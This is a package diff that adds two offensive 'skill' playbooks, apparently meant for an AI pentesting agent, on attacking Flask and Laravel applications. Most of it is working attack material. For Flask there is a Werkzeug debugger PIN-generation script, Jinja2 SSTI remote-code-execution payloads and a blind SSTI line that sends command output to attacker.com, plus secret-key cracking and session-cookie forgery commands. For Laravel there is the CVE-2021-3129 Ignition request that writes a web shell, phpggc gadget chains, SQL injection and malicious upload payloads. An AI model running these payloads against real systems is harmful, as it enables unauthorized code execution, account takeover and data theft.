@aegis-scan/skills 0.5.0 → 0.5.1

package/skills/offensive/airecon-fork/frameworks-flask/SKILL.md

@@ -0,0 +1,297 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: flask
+description: Security testing playbook for Flask applications covering Werkzeug debugger RCE, SSTI via Jinja2, session forgery, misconfigurations, and Flask-specific attack patterns
+---
+
+# Flask Security Testing
+
+Flask is a Python micro-framework — minimal by design, security depends entirely on developer choices. Critical attack surface: Werkzeug debugger RCE (PIN bypass), Jinja2 SSTI, secret key abuse for session forgery, and missing security defaults.
+
+---
+
+## Reconnaissance
+
+### Fingerprinting Flask
+
+    # Flask-specific headers and responses
+    Server: Werkzeug/<version> Python/<version>   # Confirms Flask
+    Content-Type: text/html; charset=utf-8
+
+    # Common Flask framework paths
+    GET /                         # Root
+    GET /favicon.ico              # May reveal app name
+    GET /_debug_toolbar/          # Flask Debug Toolbar
+    GET /console                  # Werkzeug interactive console (DEV ONLY)
+    GET /api/                     # REST API root (Flask-RESTX, Flask-RESTful)
+    GET /api/swagger.json         # Swagger docs
+    GET /api/docs                 # Swagger UI
+    GET /swagger/                 # Flask-RESTX swagger
+    GET /graphql                  # Graphene (Flask GraphQL)
+
+    # 404 error reveals Werkzeug:
+    GET /nonexistent → "404 Not Found: The requested URL was not found on the server"
+    # Werkzeug debugger 500:
+    GET /any-route-that-errors → Interactive Python debugger in browser
+
+    # Exposed files
+    GET /.env
+    GET /config.py
+    GET /settings.py
+    GET /requirements.txt
+
+---
+
+## Werkzeug Debugger RCE
+
+**CRITICAL** — If debug mode is on and the interactive console is accessible:
+
+    # 1. Detect debug mode:
+    GET /any-route-that-causes-exception
+    # Look for: interactive debugger in response, "↑ click to expand" in error page
+
+    # 2. Direct console access (old Werkzeug < 0.11):
+    GET /console
+    # Gives immediate Python REPL = instant RCE
+
+    # 3. PIN bypass (Werkzeug 0.11+ with PIN protection):
+    # The PIN is computed from: machine-id, MAC address, username, Python path, app module path
+    # If SSRF or LFI exists, read the components:
+
+    # Component 1: /etc/machine-id or /proc/sys/kernel/random/boot_id
+    curl <target>/read?file=/etc/machine-id
+
+    # Component 2: MAC address of network interface
+    curl <target>/read?file=/sys/class/net/eth0/address
+    # Convert to integer: int("00:11:22:33:44:55".replace(":",""), 16)
+
+    # Component 3: /etc/passwd → find username running Flask
+    curl <target>/read?file=/etc/passwd | grep www-data
+
+    # Component 4: Python executable path
+    curl <target>/read?file=/proc/<pid>/cmdline   # Flask process PID
+
+    # Component 5: App module path (from error page source)
+
+    # Generate PIN (Python):
+    python3 -c "
+    import hashlib, itertools
+    from itertools import chain
+
+    probably_public_bits = [
+        'www-data',                              # username
+        'flask.app',                             # modname
+        'Flask',                                 # app class name
+        '/usr/local/lib/python3.9/dist-packages/flask/app.py',  # app path
+    ]
+    private_bits = [
+        '2485377892366',                         # MAC as int
+        '<machine-id-content>',
+    ]
+
+    h = hashlib.sha1()
+    for bit in chain(probably_public_bits, private_bits):
+        if not bit: continue
+        if isinstance(bit, str): bit = bit.encode('utf-8')
+        h.update(bit)
+    h.update(b'cookiesalt')
+
+    cookie_name = '__wzd' + h.hexdigest()[:20]
+    rv = None
+    num = None
+    if num is None:
+        h.update(b'pinsalt')
+        num = ('%09d' % int(h.hexdigest(), 16))[:9]
+    rv = '-'.join([num[x:x+3] for x in range(0, 9, 3)])
+    print(f'PIN: {rv}')
+    "
+
+    # Use PIN to unlock console → Python REPL → RCE:
+    # Enter PIN in browser debugger interface → Interactive console → exec('import os; os.system("id")')
+
+---
+
+## Jinja2 SSTI (Server-Side Template Injection)
+
+Flask uses Jinja2 as its template engine:
+
+    # Basic detection:
+    {{7*7}}                 # Returns 49 → Jinja2 confirmed
+    {{7*'7'}}               # Returns 7777777 → Jinja2 (vs 49 = Twig)
+    ${7*7}                  # Returns ${7*7} → not Twig
+    <%= 7*7 %>              # Returns <%= 7*7 %> → not ERB
+
+    # Information gathering:
+    {{config}}              # Dump Flask config (SECRET_KEY, SQLALCHEMY_DATABASE_URI, etc.)
+    {{config.items()}}
+    {{request}}             # Flask request object
+    {{request.environ}}     # WSGI environment (server info)
+    {{self.__dict__}}
+
+    # RCE via Jinja2 sandbox bypass:
+    # Method 1: MRO traversal (most common)
+    {{''.__class__.__mro__[1].__subclasses__()}}   # List all subclasses
+
+    # Find index of subprocess.Popen:
+    {{''.__class__.__mro__[1].__subclasses__()[<idx>]('id', shell=True, stdout=-1).communicate()}}
+
+    # Method 2: lipsum global
+    {{lipsum.__globals__['os'].popen('id').read()}}
+
+    # Method 3: request.application
+    {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
+
+    # Method 4: cycler
+    {{cycler.__init__.__globals__.os.popen('id').read()}}
+
+    # Method 5: joiner
+    {{joiner.__init__.__globals__['os'].popen('id').read()}}
+
+    # Method 6: namespace
+    {{namespace.__init__.__globals__['os'].popen('id').read()}}
+
+    # Blind SSTI (no output):
+    {{''.__class__.__mro__[1].__subclasses__()[<idx>](['curl','http://attacker.com/?x='+__import__('os').popen('id').read()],stdout=-1)}}
+
+    # Fuzz for SSTI injection points:
+    # All GET/POST parameters, HTTP headers, URL path, cookie values, JSON fields
+
+---
+
+## Session Forgery (Flask SECRET_KEY)
+
+Flask signs sessions with SECRET_KEY using itsdangerous:
+
+    # Flask session cookie format: base64(<data>).base64(<timestamp>).<signature>
+    # Decode session data:
+    python3 -c "
+    import base64, json, zlib
+    cookie = '<flask_session_cookie_value>'
+    payload = cookie.split('.')[0]
+    # Pad base64
+    payload += '=' * (4 - len(payload) % 4)
+    data = base64.b64decode(payload.replace('-','+').replace('_','/'))
+    try:
+        print(json.loads(zlib.decompress(data[1:])))  # Compressed
+    except:
+        print(json.loads(data))
+    "
+
+    # Find SECRET_KEY (look in source, .env, git history, config.py)
+    # Common weak keys:
+    SECRET_KEY = 'secret'
+    SECRET_KEY = 'dev'
+    SECRET_KEY = 'development'
+    SECRET_KEY = 'supersecret'
+    SECRET_KEY = 'changeme'
+
+    # Brute force SECRET_KEY with flask-unsign:
+    pip install flask-unsign
+    flask-unsign --unsign --cookie '<cookie>' --wordlist /usr/share/wordlists/rockyou.txt
+    flask-unsign --unsign --cookie '<cookie>' --wordlist /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt
+
+    # Forge session with known/cracked key:
+    flask-unsign --sign --cookie "{'user_id': 1, 'role': 'admin', 'logged_in': True}" --secret 'secret'
+    # Set the forged cookie → admin access
+
+---
+
+## SQL Injection (SQLAlchemy / SQLite)
+
+Flask with SQLAlchemy ORM is parameterized, but raw text queries exist:
+
+    # Vulnerable:
+    db.engine.execute(f"SELECT * FROM users WHERE id={user_id}")
+    User.query.filter(text(f"username = '{username}'"))
+
+    # Safe:
+    User.query.filter_by(username=username)
+    db.execute("SELECT * FROM users WHERE id = :id", {"id": user_id})
+
+    # Test: standard SQLi payloads on all input fields
+
+---
+
+## CSRF
+
+Flask has no built-in CSRF protection — depends on Flask-WTF or manual implementation:
+
+    # Check if CSRF is implemented:
+    # Look for csrf_token in form source
+    # Or check for X-CSRFToken / X-CSRF-Token header requirement
+
+    # If no CSRF protection:
+    # All state-changing POST requests are CSRF-vulnerable if cookies are used for auth
+
+    # Flask-Login uses cookies → all POST routes without Flask-WTF are CSRF-vulnerable
+
+---
+
+## Common Flask Misconfigurations
+
+    # Debug mode in production:
+    app.run(debug=True)    # NEVER in production
+
+    # Weak secret key:
+    app.config['SECRET_KEY'] = 'dev'
+
+    # All origins CORS (Flask-CORS):
+    CORS(app)              # Equivalent to Access-Control-Allow-Origin: *
+    CORS(app, resources={r"/api/*": {"origins": "*"}})
+
+    # No HTTPS enforcement:
+    # Missing Talisman or HSTS header
+
+    # Direct host binding:
+    app.run(host='0.0.0.0')    # Exposed to all interfaces
+
+    # Unsafe deserialization (Pickle):
+    import pickle
+    data = pickle.loads(user_input)    # RCE if user controls input
+
+---
+
+## Path Traversal in Static Files
+
+    # Flask serve static: /static/<filename>
+    GET /static/../../../etc/passwd
+    GET /static/..%2F..%2F..%2Fetc%2Fpasswd
+
+    # Custom static directories may also be vulnerable:
+    GET /uploads/../config.py
+
+---
+
+## Flask Extensions Attack Surface
+
+    # Flask-Admin (admin dashboard):
+    GET /admin/               # May be exposed without auth
+    GET /admin/user/          # User management
+
+    # Flask-DebugToolbar:
+    GET /_debug_toolbar/static/
+
+    # Flask-Login: check if remember_me cookie is signed properly
+
+    # Flask-Babel: locale injection
+    GET /endpoint?lang=../../../../etc/passwd%00
+
+    # Flask-Uploads: check allowed extensions
+    # Flask-Marshmallow: mass assignment via schema
+
+---
+
+## Pro Tips
+
+1. Check `Server: Werkzeug` header — confirms Flask and version
+2. `{{config}}` in SSTI dumps SECRET_KEY and database URLs directly
+3. Werkzeug PIN bypass is complex but reliable if LFI exists to read `/etc/machine-id`
+4. `flask-unsign` is the fastest tool for cracking Flask session cookies
+5. `debug=True` in production = instant RCE via `/console` — test immediately
+6. Flask has no CSRF protection by default — all cookie-based POST routes are vulnerable
+7. SQLite database file path is often in config — try `GET /app.db` or `GET /database.db`
+
+## Summary
+
+Flask testing = check `Server: Werkzeug` + test SSTI with `{{7*7}}` on all inputs + decode/forge session cookie (flask-unsign) + probe `/console` for debug mode. SSTI in Flask/Jinja2 is direct RCE — `{{lipsum.__globals__['os'].popen('id').read()}}` is the most reliable payload. Session cookie forgery with weak/known SECRET_KEY is often easier than SSTI — always try `flask-unsign --wordlist` first.

package/skills/offensive/airecon-fork/frameworks-laravel/SKILL.md

@@ -0,0 +1,260 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: laravel
+description: Security testing playbook for Laravel applications covering debug mode, route enumeration, mass assignment, deserialization, and Laravel-specific misconfigurations
+---
+
+# Laravel Security Testing
+
+Laravel is the dominant PHP web framework. Attack surface: debug mode (Ignition), exposed routes, mass assignment via Eloquent, PHP object deserialization, CSRF bypass, file upload, and common config exposures.
+
+---
+
+## Reconnaissance
+
+### Fingerprinting Laravel
+
+    # Laravel-specific paths
+    GET /_ignition/health-check        # Confirms Laravel + version (Ignition error handler)
+    GET /telescope                     # Laravel Telescope (debug dashboard)
+    GET /telescope/requests            # HTTP requests log
+    GET /horizon                       # Laravel Horizon (queue monitor)
+    GET /nova                          # Laravel Nova (admin panel)
+    GET /api/documentation             # L5-Swagger docs
+    GET /storage/logs/laravel.log      # Log file exposure
+
+    # Headers
+    Set-Cookie: laravel_session=...    # Session cookie name
+    X-Powered-By: PHP/...
+
+    # Error pages: Ignition shows full stack trace, local variables, file contents
+    GET /nonexistent-url               # 404 with Laravel branding
+    POST /any-route-no-csrf            # 419 Page Expired (CSRF failure) confirms Laravel
+
+---
+
+## Debug Mode (Critical — APP_DEBUG=true)
+
+    # Ignition remote code execution (CVE-2021-3129)
+    # Only affects Laravel < 8.4.2 with Ignition < 2.5.2
+    POST /_ignition/execute-solution
+    Content-Type: application/json
+    {
+      "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
+      "parameters": {
+        "variableName": "username",
+        "viewFile": "php://filter/write=convert.base64-decode/resource=../public/shell.php"
+      }
+    }
+
+    # Check if Ignition endpoint is accessible:
+    curl -s <target>/_ignition/health-check
+
+    # APP_DEBUG leaks: full stack trace, environment variables, DB credentials, APP_KEY
+    # Trigger 500: send malformed input to any endpoint
+
+---
+
+## Route Enumeration
+
+    # artisan route:list output exposed (common misconfiguration)
+    GET /routes                     # Sometimes developers expose this
+    GET /api/routes
+
+    # Common Laravel route patterns
+    GET  /api/user                  # Auth user info (requires token)
+    POST /api/login
+    POST /api/register
+    GET  /api/logout
+    GET  /sanctum/csrf-cookie       # Laravel Sanctum CSRF initialization
+    POST /oauth/token               # Laravel Passport OAuth
+    GET  /oauth/authorize
+
+    # Fuzz API versions
+    GET /api/v1/
+    GET /api/v2/
+
+---
+
+## Mass Assignment (Eloquent)
+
+Laravel Eloquent `$fillable` vs `$guarded` controls mass assignment:
+
+    # Dangerous: $guarded = [] or no fillable restriction
+    # Test: inject extra fields in any POST/PUT request
+
+    # User registration → add admin fields
+    POST /api/register
+    {"name": "attacker", "email": "a@b.com", "password": "pass", "role": "admin", "is_admin": 1}
+
+    # Profile update → elevate privileges
+    PUT /api/profile
+    {"name": "me", "email": "a@b.com", "admin": true, "role_id": 1}
+
+    # Check response — if extra fields are reflected or accepted without error, mass assignment works
+
+---
+
+## CSRF
+
+    # Laravel uses CSRF tokens for all state-changing requests
+    # Token stored in session + X-XSRF-TOKEN cookie
+
+    # Bypass techniques:
+    # 1. Routes excluded from VerifyCsrfToken middleware (check routes/web.php leaks)
+    # 2. API routes are CSRF-exempt by default in routes/api.php
+    # 3. Content-Type: application/json bypass (some middleware configs)
+    # 4. X-XSRF-TOKEN header: read from cookie (requires cookie access = XSS or subdomain)
+
+    # Exploit: API routes don't require CSRF
+    POST /api/any-state-changing-action   # No CSRF needed
+
+---
+
+## PHP Object Deserialization
+
+Laravel uses serialize/unserialize in session handling and cache:
+
+    # Laravel APP_KEY needed to forge encrypted payloads
+    # If APP_KEY leaked (from debug page or .env):
+    # Use phpggc to generate gadget chains
+
+    phpggc Laravel/RCE1 system 'id' | base64    # Generate payload
+    phpggc Laravel/RCE2 system 'id'
+    phpggc -l | grep Laravel                     # List available gadget chains
+
+    # Vulnerable if using file/cookie session driver with old Laravel
+    # Forge Laravel session cookie using leaked APP_KEY
+
+    # CVE-2018-15133: Unserialize in X-XSRF-TOKEN header (old versions)
+
+---
+
+## SQL Injection
+
+    # Eloquent ORM is parameterized by default, but raw queries exist:
+
+    # Vulnerable patterns:
+    DB::select("SELECT * FROM users WHERE id = " . $id);
+    Model::whereRaw("name = '" . $name . "'");
+    Model::orderByRaw($column);    # Order-by injection
+
+    # Safe patterns:
+    DB::select("SELECT * FROM users WHERE id = ?", [$id]);
+    Model::where('name', $name);
+
+    # Order-by injection (common Laravel pattern):
+    GET /api/users?sort=name` ASC,(SELECT SLEEP(5))--
+    GET /api/products?order_by=price`,(SELECT 1 FROM (SELECT SLEEP(5))x)--
+
+---
+
+## File Upload
+
+    # Laravel file handling via Storage facade
+    # Test upload endpoints:
+    POST /api/upload   filename="shell.php"  Content-Type: image/jpeg   [PHP payload]
+    POST /api/upload   filename="shell.php%00.jpg"   # Null byte injection
+
+    # Path traversal in filename:
+    filename="../../../public/shell.php"
+
+    # Storage misconfigurations:
+    GET /storage/<uploaded-file>    # storage:link exposes storage/app/public to /storage/
+    # Brute-force uploaded file paths if predictable names
+
+    # Check if MIME validation is server-side only:
+    Content-Type: image/jpeg + PHP payload = often accepted
+
+---
+
+## Environment File Exposure
+
+    # Critical: .env contains APP_KEY, DB credentials, API keys
+    GET /.env
+    GET /.env.backup
+    GET /.env.production
+    GET /.env.local
+    GET /config/database.php    # If not protected
+
+    # APP_KEY format: base64:<32-byte-key>
+    # Used for: encrypted cookies, session tokens, signed URLs
+
+    # Laravel log file
+    GET /storage/logs/laravel.log
+    GET /storage/logs/laravel-2024-01-01.log    # Date-based logs
+
+---
+
+## Laravel Telescope (Admin Debug Dashboard)
+
+    # Telescope exposed in production = critical
+    GET /telescope
+    GET /telescope/requests          # All HTTP requests with parameters
+    GET /telescope/commands          # Artisan commands executed
+    GET /telescope/queries           # All SQL queries with full parameters
+    GET /telescope/exceptions        # Error logs with stack traces
+    GET /telescope/models            # Eloquent model changes
+    GET /telescope/mail              # Emails sent (may include tokens)
+    GET /telescope/jobs              # Queue jobs
+
+    # Telescope API (JSON)
+    GET /telescope/telescope-api/requests
+
+---
+
+## Laravel Horizon / Nova
+
+    # Horizon: queue job dashboard
+    GET /horizon
+    GET /horizon/api/stats
+    GET /horizon/api/jobs/pending
+
+    # Nova: admin panel (paid package)
+    GET /nova
+    GET /nova/login
+    GET /nova/api/resources/users    # User management API
+
+---
+
+## Authentication
+
+    # Sanctum API token exposure
+    GET /sanctum/csrf-cookie         # Initialize Sanctum
+
+    # Passport OAuth misconfigs
+    POST /oauth/token
+    {"grant_type": "client_credentials", "client_id": 1, "client_secret": "..."}
+
+    # Login response: check if password_confirm bypasses required re-auth
+    # Remember me token: very long-lived, check expiry
+
+    # Account enumeration via login response timing / different messages
+
+---
+
+## IDOR via Route Model Binding
+
+    # Laravel route model binding uses sequential integers by default
+    GET /api/invoices/1
+    GET /api/invoices/2     # Different user's invoice?
+
+    # UUIDs — still test: check if authorization validates ownership
+    GET /api/documents/550e8400-e29b-41d4-a716-446655440000
+
+---
+
+## Pro Tips
+
+1. Always check `/_ignition/health-check` — confirms version and if debug is on
+2. `.env` exposure is the most critical Laravel finding — check exhaustively
+3. Telescope in production = full application audit trail (queries, requests, emails)
+4. API routes (`/api/*`) are CSRF-exempt by default — any state-changing action is CSRF-vulnerable
+5. `APP_KEY` leak enables session forgery, encrypted field decryption, signed URL forgery
+6. Mass assignment on user registration is extremely common — always add `role`/`is_admin` fields
+7. `storage/` directory exposure via `php artisan storage:link` — uploaded files accessible publicly
+
+## Summary
+
+Laravel testing = debug mode + .env exposure + Telescope dashboard + CSRF on API routes + mass assignment via Eloquent. APP_KEY is the crown jewel — it enables forgery of every cryptographic primitive in Laravel. Telescope in production is a free application audit log.